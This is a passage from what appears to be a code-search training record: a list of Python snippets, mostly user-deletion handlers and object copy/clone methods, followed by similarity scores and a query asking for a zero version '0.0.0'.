user=user)\r\n super(Post, self).delete()\r\n cache_bust([('posts_timeline', user.pk), ('comments', self.pk)])\r\n return True\r\n return False", "def test_delete_useruser_uuid_post(self):\n pass", "def delete_user(id):\n user = Users.query.filter_by(id=id).first()\n user.delete()\n if not user:\n return send_msg(404, 'Not Found')\n return send_msg(204, \"No data\")", "def delete_by(self, user):\n if user.is_superuser or user is self.added_by:\n self.delete()", "def delete_in_database(user: User) -> True:\n DBDiscussionSession.query(History).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.flush()\n return True", "def delete_user(user_id):\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({}), 200", "def delete_user_calendars(user_id):\n with session_scope(DBSession) as session:\n calendar_ids_to_delete = session.query(CalendarId).filter(\n CalendarId.user_id == user_id).all()\n\n if calendar_ids_to_delete: # user has atleast one calendar\n for calendar_id in calendar_ids_to_delete:\n session.delete(calendar_id)", "def delete(self):\n self.deleted = True\n # Deactivate the user to disallow authentication and also\n # to let the user verify the email again after recovery.\n self.is_active = False\n self.save()\n self.history.create(user_id=self.pk, action=user_history.DELETION)", "def delete_user(user_id=None):\n\n user = storage.get(\"User\", user_id)\n if user is None:\n abort(404)\n else:\n storage.delete(user)\n storage.save()\n return jsonify({}), 200", "def delete_user(request):\n user_id = request.POST.get('user_id')\n User.objects.filter(id=user_id).delete()\n response = {'status': 1, 'status_message': 'Success'}\n return HttpResponse(json.dumps(response))", "def test_delete_post_by_user(self):\n\n response = self.client.delete(reverse('api:posts-detail', kwargs={'pk': self.post1.id}))\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def delete(self, user_id):\n res = self._user.delete_user(user_id)\n\n if res:\n return {\n \"status\": 200,\n \"data\": [{\n \"id\": res[\"id\"],\n \"message\": \"user record has been deleted\"\n }]\n }, 200\n else:\n return {\n \"status\": 404,\n \"error\": \"Not found for id {}\".format(user_id)\n }, 404", "def review_delete_handler(review_id, user):\n review = Review.query.get_or_404(str(review_id))\n if review.is_archived is True:\n raise NotFound\n if review.user_id != user.id:\n raise AccessDenied\n review.delete()\n return jsonify(message='Request processed successfully')", "def delete_user(self) -> None:\n table_dictionary = {\n 'Apple': {\n 'table': 'AppleReceipts',\n 'user_id': 'User_id'\n },\n 'ESL': {\n 'table': 'ESLReceipts',\n 'user_id': 'User_id'\n },\n 'Transactions': {\n 'table': 'Transactions',\n 'user_id': 'User_id'\n },\n 'Users': {\n 'table': 'Users',\n 'user_id': 'id'\n },\n }\n\n # delete the current user's information from the db.\n for key in table_dictionary:\n query = f\"\"\"\n DELETE\n FROM {table_dictionary[key]['table']}\n WHERE {table_dictionary[key]['user_id']}=?;\n \"\"\"\n self.db.commit(query, values=(self.id,))\n\n # perform a sign out\n self.sign_out()\n\n log(f\"User:{self.id} has deleted their account.\")", "def delete_user_by_id(user_id):\n return woo_request_helper().delete_details(wc_endpoint='customers/{}'.format(user_id))", "def deleteUser(self,name):\n raise BorkedDeleteUser", "def delete_user_async(self, user):\n # type: (dict) -> dict\n self.request_url = \"{0}/{1}/{2}\".format(self.API_URL, self.USER_ENDPOINT, user['id'])\n return self.__create_request(payload=user, request_type=self.REQUEST_DELETE, version=\"v2\")", "def del_user_id(user_id):\r\n obj = storage.get(User, user_id)\r\n if obj is None:\r\n abort(404)\r\n obj.delete()\r\n storage.save()\r\n return jsonify({}), 200", "def delete_user(user_id):\n user_obj = storage.get(\"User\", user_id)\n if user_obj:\n storage.delete(user_obj)\n storage.save()\n return jsonify({}), 200\n else:\n abort(404)", "def delete_user():\r\n raise NotImplementedError()", "def delete_user(self, instance, name):\n return instance.delete_user(name)" ]
[ "0.7564674", "0.7383004", "0.6840054", "0.6774973", "0.67743796", "0.66971105", "0.6603117", "0.65684706", "0.654473", "0.6492794", "0.6456428", "0.63981634", "0.6362671", "0.63221097", "0.62822104", "0.62783", "0.62724733", "0.62385744", "0.61420053", "0.61398315", "0.6122251", "0.6109359", "0.6092476", "0.6091207", "0.60840106", "0.6053058", "0.60407203", "0.60404986", "0.60355985", "0.60286033", "0.60264456", "0.6023707", "0.60125583", "0.6003506", "0.6001466", "0.59963584", "0.59865355", "0.59641105", "0.59311676", "0.5919194", "0.5911665", "0.5898715", "0.5885181", "0.58795154", "0.58780724", "0.585051", "0.58472747", "0.584105", "0.5836084", "0.5834376", "0.5825048", "0.5819891", "0.5815186", "0.58120847", "0.58059615", "0.57925117", "0.5781256", "0.5771061", "0.57665056", "0.5748979", "0.57456464", "0.57408726", "0.57387036", "0.5736932", "0.57262987", "0.57232755", "0.57198113", "0.571755", "0.57150507", "0.5713469", "0.5713469", "0.5713469", "0.570919", "0.5708002", "0.570072", "0.5699215", "0.5687064", "0.56803334", "0.5678939", "0.5667256", "0.5666295", "0.5657649", "0.56560504", "0.5653198", "0.5651664", "0.5649159", "0.56447375", "0.5644712", "0.5637876", "0.5633691", "0.56270194", "0.56181604", "0.5616766", "0.56065387", "0.55865973", "0.5572534", "0.55686677", "0.5567281", "0.5566963", "0.55661047" ]
0.77435535
0
Get zero version `0.0.0`
def zero(cls: Type[_R]) -> _R: return cls("0.0.0")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def version_number() -> int:\n return 0", "def get_version():\n return '%d.%d.%d' % version_info", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_version():\n ver = '0.0.0'\n req = restcall(0, 'config', 10.0)\n if req['text'] is not None:\n try: \n tree = ET.fromstring(req['text'])\n ver = tree.findall('app_version')[0].text\n if ver is None:\n ver = '0.0.0'\n _LOGGER.info(\"ISY: firmware version: %s\", ver)\n except ET.ParseError:\n _LOGGER.error(\"No version information found on ISY.\")\n return ver", "def get_version(self):\n return 0", "def _get_version(self):", "def get_version():\n return 1", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def test_parse_version(self):\n version = VersionNumberScaleMeasurement.parse_version(None)\n self.assertEqual(Version(\"0\"), version)", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def get_version():\n\n version_string = version_from_versioneer()\n\n if not version_string:\n version_string = version_from_pip()\n\n return version_string", "def get_version():\n click.echo(get_current_version_number())", "def get_version_number():\n return [0, 1, 0]", "def delete_closing_zero(model_version: str) -> str:\r\n if model_version[-2:] == \".0\":\r\n return model_version[:-2]\r\n return model_version", "def test_get_version(self):\n pass", "def get_version():\n return about.get_version()", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def default_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"default_version_number\")", "def version(self) -> str:\n return '0.1'", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:", "def get_version(self):\r\n\r\n return self.versions[0].number", "def get_version():\n return '.'.join(map(str, VERSION))", "def do_version(self):\n return \"1.0.0\", True", "def version():\n\n pass", "def getDefaultVersion():\n return _libsbml.FbcExtension_getDefaultVersion()", "def get_version(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/version\").json()", "def test_get_short_version(self):\n pass", "def test_none_version_return(self):\n version_prefix = 'v'\n tags = []\n for i in range(15):\n tags.append(_TagInfo('1.0.' + str(i),\n 'commit' + str(i),\n version_prefix))\n for i in range(15):\n shuffle(tags)\n self.assertEqual(_seek_last_semver_tag(tags, version_prefix), None)", "def get_version():\r\n return __version__", "def version(self):\n _, body = self.request('/', 'GET')\n return body.get('version', None)", "def version_min():\n return VERSION_MIN", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def getDefaultVersion():\n return _libsbml.CompExtension_getDefaultVersion()", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def get_version(self):\n return self.__make_api_call('get/version')", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_default_version(self):\n # latest is a special case where we don't have to check if it exists\n if self.default_version == 'latest':\n return self.default_version\n # check if the default_version exists\n version_qs = self.versions.filter(\n slug=self.default_version,\n active=True\n )\n if version_qs.exists():\n return self.default_version\n return 'latest'", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def strip_leading_zeros(version: str) -> str:\n return \".\".join(str(int(i)) for i in version.split(\".\"))", "def get_version(self):\n pass", "def test__get_component_version_empty(self):\n self._ucr({'repository/online/component/a/version': ''})\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): '',\n })\n ver = U.UCS_Version((MAJOR, MINOR, 0)) # comonent.erratalevel!\n comp_ver = self.u._get_component_versions('a', start=ver, end=ver)\n self.assertEqual(set((ver,)), comp_ver)", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def test_version_0(self):\r\n self.assertEqual(0, self._version_test(self.version0_nodrafts))", "def version(self) -> 'outputs.VersionResponse':\n return pulumi.get(self, \"version\")", "def test_get_version():\n result = uflash.get_version()\n assert result == '.'.join([str(i) for i in uflash._VERSION])", "def test_above_24_latest_version(self):\n self.data['version'] = ''\n self.data['appVersion'] = '28.0'\n\n up = self.get(self.data)\n rdf = up.get_rdf()\n assert rdf.find('20202020.01') > -1", "def getDefaultVersion():\n return _libsbml.SBMLDocument_getDefaultVersion()", "def version_get():\n try:\n return json_response.success({'version': version.local_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def version():\n return uname().version", "def version():\n return uname().version", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def version_from_versioneer():\n\n # Attempt to get the version string from the git repository\n try:\n from .versioneer_version import get_versions # pylint: disable=import-outside-toplevel\n version_info = get_versions()\n if version_info['error'] is None:\n return version_info['version']\n return None\n except: # pylint: disable=bare-except\n return None", "def getversion(online: bool = True) -> str:\n branches = {\n 'master': 'branches/master',\n 'stable': 'branches/stable',\n }\n data = getversiondict()\n data['cmp_ver'] = 'n/a'\n local_hsh = data.get('hsh', '')\n hsh = {}\n\n if online:\n if not local_hsh:\n data['cmp_ver'] = 'UNKNOWN'\n else:\n for branch, path in branches.items():\n with suppress(Exception):\n hsh[getversion_onlinerepo(path)] = branch\n if hsh:\n data['cmp_ver'] = hsh.get(local_hsh, 'OUTDATED')\n\n data['hsh'] = local_hsh[:7] # make short hash from full hash\n return '{tag} ({hsh}, {rev}, {date}, {cmp_ver})'.format_map(data)", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def version():\n\n version = None\n output = gitopen(['--version'])\n m = re.search(br\" version ([\\d\\.A-Za-z]+)\", output)\n if m is not None:\n version = m.group(1).decode('utf-8')\n return version", "def version(self):", "def get_version():\n\n with open('yubico/yubico_version.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def test_version_missing(self):\r\n self.assertIsNone(self._version_test(self.no_version))", "def get_self_version(dist_name):\n try:\n return get_distribution(dist_name).version\n except DistributionNotFound:\n return 'version not found'", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def get_version() -> str:\n return __version__", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_base_version():\n if BASE_VERSION is None:\n return shell_output('git describe --tags --abbrev=0')\n return BASE_VERSION", "def getDefaultVersion():\n return _libsbml.MultiExtension_getDefaultVersion()", "def version():\n version_info = pbr.version.VersionInfo('ardana-service')\n return version_info.version_string_with_vcs()", "def get_version(cls) -> str:\n if not cls.is_available():\n return 'None'\n else:\n import pkg_resources\n try:\n return pkg_resources.get_distribution('ncnn').version\n except Exception:\n return 'None'", "def version():\n return __VERSION__", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def print_version():\n print(\"1.0\")", "def get_server_version():\n url_address = 'https://raw.githubusercontent.com/muhammadfredo/FrMaya/master/FrMaya/version.py'\n url_data = urllib2.urlopen(url_address).read(200)\n result = re.search(r'(\\d+), (\\d+), (\\d+)', url_data, re.MULTILINE)\n if result:\n version_list = [int(v) for v in result.groups()]\n return version_list\n else:\n raise ValueError('Cannot get server version!!!')", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def get_version():\n return magpy.get_version()", "def get_version():\n path = CWD / \"pettingzoo\" / \"__init__.py\"\n content = path.read_text()\n\n for line in content.splitlines():\n if line.startswith(\"__version__\"):\n return line.strip().split()[-1].strip().strip('\"')\n raise RuntimeError(\"bad version data in __init__.py\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def dump_version(input_bytes):\n return dump_from_release(input_bytes, \"version\")", "def version_number(path: str) -> str:\n exp = r'__version__[ ]*=[ ]*[\"|\\']([\\d]+\\.[\\d]+\\.[\\d]+[\\.dev[\\d]*]?)[\"|\\']'\n version_re = re.compile(exp)\n\n with open(path, 'r') as fqe_version:\n version = version_re.search(fqe_version.read()).group(1)\n\n return version", "def src_get_version():\n return ffi.string(_lib.src_get_version()).decode()", "def test_npm_latest_version_request(_foo):\n version = NPMMonitor.fetch_latest_package_version('foobar')\n assert version == '1.3.5'\n assert NPMMonitor.fetch_latest_package_version('foobar') is None\n assert NPMMonitor.fetch_latest_package_version('foobar') is None", "def get_version():\n\n with open('u2fval/__init__.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)" ]
[ "0.7245187", "0.668971", "0.66882396", "0.6665648", "0.6570469", "0.64901686", "0.64345765", "0.64268774", "0.63672644", "0.6360634", "0.63367814", "0.6328667", "0.6325577", "0.63126534", "0.6253386", "0.6247568", "0.62471354", "0.6241517", "0.6227065", "0.6226674", "0.6218984", "0.6200833", "0.61821896", "0.617639", "0.617639", "0.61438334", "0.61386836", "0.61378485", "0.61342424", "0.6113383", "0.6110186", "0.61097014", "0.6106239", "0.60923064", "0.6071033", "0.60624963", "0.6062326", "0.6062326", "0.6062326", "0.6044074", "0.604395", "0.60416824", "0.60416824", "0.60087603", "0.60063046", "0.6000759", "0.59927285", "0.59918916", "0.59911203", "0.5984771", "0.59792644", "0.59719807", "0.5960774", "0.59596086", "0.59578574", "0.59572417", "0.5952879", "0.59457225", "0.5941938", "0.5941938", "0.5938286", "0.5937441", "0.59345543", "0.59317154", "0.5921998", "0.5919399", "0.59184206", "0.591722", "0.5915258", "0.59123796", "0.59042484", "0.59028536", "0.5895182", "0.58951193", "0.5888707", "0.58870566", "0.58806163", "0.5879938", "0.58751976", "0.5871814", "0.5869985", "0.58697766", "0.5856508", "0.58334434", "0.58215827", "0.58200467", "0.5815895", "0.5815701", "0.5815175", "0.581312", "0.581312", "0.581312", "0.581312", "0.581312", "0.58038414", "0.5800681", "0.57990503", "0.5792473", "0.5791157", "0.5784804" ]
0.68623227
1
Create a copy of a current version instance.
def copy(self: _R) -> _R: return self.__class__(self.dumps())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_clone(self, version_id):\n raise Exception(\"TODO\")", "def __copy__(self):\n return self.__class__(self.baseurl, self.template, self.selection[:],\n self.slice[:], self.application)", "def make_reversion_to_copy(self, copy):\n if copy.copy_of != self._id:\n raise VersioningError(\"%s is not a copy of %s\" % (copy, self))\n app = deepcopy(copy.to_json())\n app['_rev'] = self._rev\n app['_id'] = self._id\n app['version'] = self.version\n app['copy_of'] = None\n app.pop('_attachments', None)\n app.pop('external_blobs', None)\n cls = self.__class__\n app = cls.wrap(app)\n app.copy_attachments(copy)\n\n for form in app.get_forms():\n # reset the form's validation cache, since the form content is\n # likely to have changed in the revert!\n form.clear_validation_cache()\n form.version = None\n\n app.build_broken = False\n\n return app", "def copy(self):\n cls = self.__class__\n result = cls.__new__(cls)\n result.__dict__.update(self.__dict__)\n return result", "def copy (self):\n return self.__class__(self.name, self[:])", "def _new_instance(self):\n return self.__class__(self._vmodule)", "def copy(self):\n return object.__new__(type(self))", "def clone(self):\n return _libsbml.SBMLLevelVersionConverter_clone(self)", "def copy(self):\n cls = type(self)\n new = cls()\n new.default = deepcopy(self.default)\n new.current = deepcopy(self.current)\n new.stepnames = deepcopy(self.stepnames)\n return new", "def copy(self):\n return self.__class__(self)", "def copy(self):\n return self.__class__(self)", "def copy(self):\n return self.__class__(**vars(self))", "def copy(self):\n return self.__class__(dict(self))", "def copy(self):\n out = type(self).__new__(self.__class__)\n out.__dict__.update(self.__dict__)\n # make sure the copy has its own unique random number generator\n seed_seq = self.rng._bit_generator._seed_seq.spawn(1)[0]\n out.__dict__['rng'] = get_generator(seed_seq)\n return out", "def clone(self):\n return self.__class__(self.name, *self)", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def copy(self):\n return self.from_builder(self)", "def copy(self):\n o = self.__class__(self.project, self.name)\n Scriptable.copy(self, o)\n o.position = tuple(self.position)\n o.direction = self.direction\n o.rotation_style = self.rotation_style\n o.size = self.size\n o.is_draggable = self.is_draggable\n o.is_visible = self.is_visible\n return o", "def copy(self):\n new = object.__new__(type(self))\n new.bot = self.bot\n new.description = self.description\n new.icon_hash = self.icon_hash\n new.icon_type = self.icon_type\n new.id = 0\n new.name = self.name\n return new", "def copy(self):\n return self.__class__(self.value, self.is_cloud)", "def copy(self):\n\t\ttemp = self.__class__()\n\t\ttemp.copy_from(self)\n\t\treturn temp", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def __copy__(self):\n cls = self.__class__\n result = cls.__new__(cls)\n to_copy = {\"_cache\", \"_buffers\", \"_parameters\", \"_modules\"}\n result.__dict__.update(\n {k: v.copy() if k in to_copy else v for k, v in self.__dict__.items()}\n )\n return result", "def clone(self):", "def copy(self):\n import copy as pcopy\n return pcopy.deepcopy(self)", "def clone_shallow(self, forced_version_date=None):\n if not self.pk:\n raise ValueError('Instance must be saved before it can be cloned')\n\n if self.version_end_date:\n raise ValueError('This is a historical item and can not be cloned.')\n\n if forced_version_date:\n if not self.version_start_date <= forced_version_date <= get_utc_now():\n raise ValueError('The clone date must be between the version start date and now.')\n else:\n forced_version_date = get_utc_now()\n\n earlier_version = self\n\n later_version = copy.copy(earlier_version)\n later_version.version_end_date = None\n later_version.version_start_date = forced_version_date\n\n # set earlier_version's ID to a new UUID so the clone (later_version) can\n # get the old one -- this allows 'head' to always have the original\n # id allowing us to get at all historic foreign key relationships\n earlier_version.id = six.u(str(uuid.uuid4()))\n earlier_version.version_end_date = forced_version_date\n earlier_version.save()\n\n for field in earlier_version._meta.many_to_many:\n earlier_version.clone_relations_shallow(later_version, field.attname, forced_version_date)\n\n if hasattr(earlier_version._meta, 'many_to_many_related'):\n for rel in earlier_version._meta.many_to_many_related:\n earlier_version.clone_relations_shallow(later_version, rel.via_field_name, forced_version_date)\n\n later_version.save()\n\n return later_version", "def __copy__(self, *args, **kwargs):\n return self.copy()", "def copy (self):\n import copy\n return copy.copy(self)", "def copy(self):\n new = self\n return new", "def copy(self):\n cls = type(self)\n # Create a new instance without calling __init__: parameters are\n # different depending on the class.\n new_box = cls.__new__(cls)\n # Copy attributes\n new_box.__dict__.update(self.__dict__)\n return new_box", "def copy(self):\n new_client = self._client.copy()\n return self.__class__(self.instance_id, new_client,\n self._cluster_location_id,\n display_name=self.display_name)", "def copy(self):\n new = object.__new__(type(self))\n new.approximate_online_count = self.approximate_online_count\n new.approximate_user_count = self.approximate_user_count\n new.description = self.description\n new.discovery_splash_hash = self.discovery_splash_hash\n new.discovery_splash_type = self.discovery_splash_type\n new.emojis = self.emojis.copy()\n features = self.features\n if (features is not None):\n features = (*features,)\n new.features = features\n new.icon_hash = self.icon_hash\n new.icon_type = self.icon_type\n new.id = self.id\n new.invite_splash_hash = self.invite_splash_hash\n new.invite_splash_type = self.invite_splash_type\n new.stickers = self.stickers.copy()\n new.name = self.name\n return new", "def copy(self):\n return self.__class__(self.name, list(self.gRNAs))", "def copy(self):", "def __copy__(self):\n trait_data = self.__getstate__()\n inst = self.__class__.create(trait_data)\n return inst", "def make_instance(self, include_optional):\n # model = synclient.models.version_info.VersionInfo() # noqa: E501\n if include_optional :\n return VersionInfo(\n content_md5 = '0', \n content_size = '0', \n id = '0', \n modified_by = '0', \n modified_by_principal_id = '0', \n modified_on = '0', \n version_comment = '0', \n version_label = '0', \n version_number = 56\n )\n else :\n return VersionInfo(\n )", "def copy(self):\n cp = self.__class__() # create a new instance of the subclass\n # copy current state to the new instance\n cp._acc = self._acc\n cp._seed = self._seed\n cp._secret = self._secret\n cp._last_stripe = self._last_stripe\n cp._total_length = self._total_length\n cp._buffer = self._buffer\n return cp", "def copy(self):\n def init(self, **kwargs):\n \"\"\"Initialization.\"\"\"\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n return type(type(self).__name__, (type(self),), {\"__init__\": init})(**self.__dict__)", "def clone(self):\n\n copy = self.__class__(self.name, self.data)\n\n copy.set_fixed_variables_from_pdf(self)\n \n return copy", "def copy(self):\n\t\treturn pythoncopy.deepcopy(self)", "def copy(self):\n new_model = Model(\n name=self.name,\n functions=copy.deepcopy(self.functions),\n domain=self.domain.copy(),\n density=self.density.copy(),\n )\n new_model.update()\n\n return new_model", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy (self):\n copy = NFFG(id=self.id, name=self.name, version=self.version,\n mode=self.mode, metadata=self.metadata.copy(),\n status=self.status)\n copy.network = self.network.copy()\n return copy", "def clone(self):\r\n #return copy(self)\r\n cp = self.__class__(self.type, None, None, self.name)\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\n pass", "def copy(self):\n pass", "def copy(self):\n pass", "def copy(self):\n try:\n return self.__class__(self, copy=True)\n except TypeError:\n new = self.__class__(copy.deepcopy(self))\n return new", "def clone(self):\n return self", "def copy(self):\n return self.mutate().simple_copy()", "def __copy__(self):\n return self.copy()", "def copy(self):\n return self.__class__(self.items, self.is_cloud)", "def clone(self):\n raise NotImplementedError", "def export_as(self, version):\n # its a new version please update the paths\n version.update_paths()\n # set the extension to '.comp'\n version.extension = self.extensions[0]\n version.created_with = self.name\n\n raise NotImplementedError(\n 'export_as() is not implemented yet for Fusion'\n )\n\n # create a local copy\n self.create_local_copy(version)", "def copy(self):\r\n return copy.copy(self)", "def clone(self):\r\n cp = self.__class__(self.type, self.data, self.name)\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\n dnew = Date(self.month, self.day, self.year)\n return dnew", "def copy(self):\n new = object.__new__(type(self))\n new.required = self.required\n new.title = self.title\n new.type = self.type\n values = self.values\n if (values is not None):\n values = (*values,)\n new.values = values\n return new", "def copy(self):\n return self.from_string(self.format(), self.filename, ignore_checksum=True)", "def copy(self):\n from copy import deepcopy\n return deepcopy(self)", "def copy(self):\n return copy.copy(self)", "def copy(self):\n return copy.copy(self)", "def copy(self):\n return copy.copy(self)", "def clone(self) -> Self:\n return clone(self, safe=True)", "def clone(self):\n return self.copy()", "def copy(self):\n return vertex(self.x, self.y, self.z)", "def copy(self):\n if self.__root__ is self:\n return plist(self)\n return plist(self, root=self.__root__.copy())", "def copy(self):\n return copy(self)", "def copy(self):\n return copy(self)", "def copy(self):\n new = self.__class__()\n new.values = self.values.copy()\n return new", "def copy(self):\n return Object(_default_item=self._default_item, **self._items)", "def copy(self):\n return super().copy()", "def copy_with(self):\n return self.copy()", "def _copy_(self):\n return copy.copy(self)", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def copy(self):\n return Struct(self)", "def clone(self):\n from copy import deepcopy\n return deepcopy(self)", "def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def clone(self):\n # make copies of my state\n beta = self.beta\n theta = self.theta.clone()\n sigma = self.sigma.clone()\n likelihoods = self.prior.clone(), self.data.clone(), self.posterior.clone()\n\n # make one and return it\n return type(self)(beta=beta, theta=theta, likelihoods=likelihoods, sigma=sigma)", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def clone(self):\n return shallow_clone(self)", "def copy(self):\n new_date = Date(self.month, self.day, self.year)\n return new_date", "def copy(self):\n new = self.__class__(integration=None, data=None)\n for attribute, value in self.__dict__.items():\n if attribute in self.referenced_attributes:\n setattr(new, attribute, value)\n elif hasattr(value, 'copy'):\n setattr(new, attribute, value.copy())\n else:\n setattr(new, attribute, deepcopy(value))\n return new", "def copy(self):\n o = self.__class__(self.target,\n self.block.copy(),\n self.style,\n self.is_visible,\n self.pos)\n o.slider_min = self.slider_min\n o.slider_max = self.slider_max\n return o", "def copy(self) -> 'BaseImage':\n image = BaseImage(\n image_path=self._filepath,\n drawing_mode=self._drawing_mode,\n drawing_offset=self._drawing_offset,\n load_from_file=False,\n frombase64=self._frombase64\n )\n image._angle = self._angle\n image._surface = self._surface.copy()\n image._original_surface = self._surface.copy()\n image.smooth_scaling = self.smooth_scaling\n if self._attributes is not None:\n for k in self._attributes.keys():\n image.set_attribute(k, self._attributes[k])\n return image", "def copy(self):\n p = Project()\n p.name = self.name\n p.path = self.path\n p._plugin = self._plugin\n p.stage = self.stage.copy()\n p.stage.project = p\n\n for sprite in self.sprites:\n s = sprite.copy()\n s.project = p\n p.sprites.append(s)\n\n for actor in self.actors:\n if isinstance(actor, Sprite):\n p.actors.append(p.get_sprite(actor.name))\n else:\n a = actor.copy()\n if isinstance(a, Watcher):\n if isinstance(a.target, Project):\n a.target = p\n elif isinstance(a.target, Stage):\n a.target = p.stage\n else:\n a.target = p.get_sprite(a.target.name)\n p.actors.append(a)\n\n p.variables = dict((n, v.copy()) for (n, v) in self.variables.items())\n p.lists = dict((n, l.copy()) for (n, l) in self.lists.items())\n p.thumbnail = self.thumbnail\n p.tempo = self.tempo\n p.notes = self.notes\n p.author = self.author\n return p", "def copy(self):\n\t\tassert ltrace_func(TRACE_BASE)\n\t\ttemp = self.__class__()\n\t\ttemp.copy_from(self)\n\t\treturn temp", "def __copy__(self,iClass=None):\n iClass = iClass or self.__class__\n clone = iClass(GPath(self.archive))\n copier = copy.copy\n getter = object.__getattribute__\n setter = object.__setattr__\n for attr in Installer.__slots__:\n setter(clone,attr,copier(getter(self,attr)))\n return clone", "def copy(self) -> ItemVariant:\n return ItemVariant(\n self.pak_id,\n self.editor,\n self.vbsp_config,\n 